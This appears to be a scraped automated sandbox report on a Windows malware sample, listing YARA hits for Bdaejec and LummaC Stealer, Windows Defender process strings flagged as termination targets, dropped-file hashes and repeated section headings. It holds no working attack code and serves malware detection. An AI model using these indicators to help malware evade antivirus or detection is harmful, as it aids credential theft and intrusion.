Code function: 2_2_0032139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_0032139F

AV process strings found (often used to terminate AV products)

Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

ID:	1481153
Product:	CloudBasic
Start time:	04:57:18
Start date:	25.07.2024
Sample:	Lisect_AVT_24003_G1A_72.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0140e8aab1d9274870495213cdf82291
SHA1:	094a5f534dd47158b2e936f1c6bb8351fb3f1706
SHA256:	61f30e4ff3a0f6c6b50ac05dacc8344ba3ed9911c2888a606e7c15c4ea4a469f
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows	BE24B4EBED28B9588B8AE174E95C4285	C89B3398B15CC38ED29E508C9024E412CE76049F	85F4C6069942D9C7B0095F89AF463C192EA8801784751CA3322A8A067A3B28FD
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	PE32 executable (GUI) Intel 80386, for MS Windows	31DA1001265A8090340DF175C3EBB35B	1635764E533D859EDA7227B5BA5B4BEF779A1D59	9E444CFD7BDB8C393B64F75310A0CA7E80FFE8A678689DA2D1D1EBC7B9DE3AAD
C:\Program Files\7-Zip\Uninstall.exe	PE32 executable (GUI) Intel 80386, for MS Windows	C85E3E1B5216AC6FE2FF69F1124397E0	563AD0F43213986CF3147A1AE3C09686A50347A3	E05444242F8F435F71BD0F1924D5E8FC27214C8AEF155E45A1D93D047B2EAD00
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jawuwAtX.exe_92f7bd4c2a248b9282872241334e9a346491113_751f8ef7_703e38e9-db4d-48e3-b293-e2d61713eacb\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	BBADCCD0B29A0F6D427D1BECF00F6760	6F49A232417353A53FE474F073594DC0FD4433CA	D361397C5F0A8A074EE41442A276007DF816BBEE58E10D323C1A709A7D5852AF
C:\ProgramData\Microsoft\Windows\WER\Temp\WER96C8.tmp.dmp	Mini DuMP crash report, 15 streams, Thu Jul 25 02:58:17 2024, 0x1205a4 type	7DC6DE53410E16F349D3BD15BC83D703	880A032BC0CACC88C66680935AC694904793DA13	7792385A5E2532BC3F7D493D9565DD99F5543EEBADA5C4BB12E33776D05CD169
C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F2.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	2E62EDBC581E22FE0BFB2198BF39E3D7	BFDED2D84FB1657C52374CB266B3296B56F365AA	B17981CC70A7972D805F23D28617C6A879E6A66574647D632CA9FAD11C8E1741
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9822.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	C97A4F318CCFF48A7CCAC0273AB94467	68A81AC12206DFFA108C79B30DC551CCD760470D	5B0B53D78CE962C0B793E248CD54FBFFB1C73E1E891CFF95A7AAB2E59DEF2C46
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar	ASCII text	D3B07384D113EDEC49EAA6238AD5FF00	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
C:\Users\user\AppData\Local\Temp\341D4B96.exe	ASCII text	D3B07384D113EDEC49EAA6238AD5FF00	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	PE32 executable (GUI) Intel 80386, for MS Windows	F7D21DE5C4E81341ECCD280C11DDCC9A	D4E9EF10D7685D491583C6FA93AE5D9105D815BD	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	1512CC64868E0D865770FE9F25DBBC5D	C3E633EE956232620C025EA1F0CA3BE96FE25863	F1407F8FFEB3569813B3A31CEE70B3B1C283F3154F36C78656AE95DB11C8ED12

Windows Analysis Report
Lisect_AVT_24003_G1A_72.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Lisect_AVT_24003_G1A_72.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Lisect_AVT_24003_G1A_72.exe

Malware Threat Intel
Provided by